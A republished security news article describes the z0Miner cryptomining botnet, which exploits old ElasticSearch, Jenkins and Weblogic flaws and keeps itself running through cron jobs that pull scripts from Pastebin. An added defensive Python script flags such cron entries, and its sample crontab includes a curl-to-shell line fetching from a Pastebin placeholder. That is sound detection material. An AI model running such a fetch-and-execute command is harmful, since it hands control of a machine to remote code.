Hard News Hard Hitting News Source Global Political News


Cryptomining Botnet Targets Unpatched Vulnerabilities in Cloud Servers

Attackers often keep upgrading their tools to scan for and infect new devices by exploiting unpatched vulnerabilities. Recently, the z0Miner cryptomining malware was spotted probing cloud servers by exploiting a new set of unpatched vulnerabilities.

z0Miner active campaign

Qihoo 360 Netlab researchers have observed z0Miner actively hunting for ElasticSearch and Jenkins servers affected by vulnerabilities addressed in 2015 and earlier.

  • The botnet was using exploits targeting an ElasticSearch RCE vulnerability (CVE-2015-1427) and an older RCE impacting Jenkins servers.
  • After compromising a server, the malware first downloads a malicious shell script and sets up a new cron entry to periodically grab and execute malicious scripts from Pastebin.
  • Further, the botnet downloads a mining kit containing an XMRig miner script (java.exe), a config file (config.json), and a starter script (solr.sh). It starts to mine for Monero (XMR) cryptocurrency in the background.
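The persistence described above leaves traces a defender can look for in crontab contents. The following Python check is an added example, not code from the article or from Netlab: it flags cron entries that fetch from Pastebin, pipe a download into a shell, or reference the kit file names listed above. The regex heuristics and the sample crontab are assumptions constructed for illustration.

```python
import re

# Kit file names reported in the article. config.json is left out on purpose:
# it is too common a name to flag on its own.
KIT_FILES = ("java.exe", "solr.sh")

# Heuristic patterns (assumptions for this example, not vendor signatures).
FETCH = re.compile(r"\b(?:curl|wget)\b", re.I)
PASTEBIN = re.compile(r"https?://(?:www\.)?pastebin\.com/\S+", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|z)?sh\b")


def audit_crontab(text):
    """Return [(line_number, [reasons])] for suspicious cron entries."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        reasons = []
        if FETCH.search(line):
            if PASTEBIN.search(line):
                reasons.append("fetches from Pastebin")
            if PIPE_TO_SHELL.search(line):
                reasons.append("pipes a download into a shell")
        for name in KIT_FILES:
            # Match the name as a whole path component, not as a substring.
            if re.search(r"(?:^|[\s/])" + re.escape(name) + r"(?=\s|$)", line):
                reasons.append("references kit file " + name)
        if reasons:
            findings.append((lineno, reasons))
    return findings


# Constructed sample crontab; the paste ID and hosts are placeholders.
SAMPLE = """\
# constructed sample crontab, not taken from a real host
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/30 * * * * curl -fsSL https://pastebin.com/raw/EXAMPLE | sh
@reboot /tmp/.x/solr.sh >/dev/null 2>&1
15 * * * * wget -q -O /var/backups/db.sql.gz https://backup.example.internal/db.sql.gz
"""

if __name__ == "__main__":
    for lineno, reasons in audit_crontab(SAMPLE):
        print(f"line {lineno}: {', '.join(reasons)}")
```

Feed it the output of `crontab -l` for each account and the files under `/etc/cron.d` to cover both per-user and system-wide entries.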

Earlier campaigns

Since its emergence last year, z0Miner has been observed gaining persistence via crontab and mining for Monero cryptocurrency.

  • According to the Tencent Security Team, z0Miner was actively exploiting two Weblogic pre-auth RCE bugs tracked as CVE-2020-14882 and CVE-2020-14883 to spread to other devices.
  • In addition, the botnet was spreading laterally on the network of already compromised devices via SSH.
  • Using similar, recently identified attack logic, it has already compromised thousands of devices.

Conclusion

z0Miner’s recent campaign demonstrates how vulnerabilities identified years ago, if not patched, can be used by cybercriminals for making a profit. Therefore, it becomes important for organizations to keep all their systems and applications updated with the latest patches to avoid such threats.

Source: https://cyware.com/news/cryptomining-botnet-targets-unpatched-vulnerabilities-in-cloud-servers-29f9f8a3
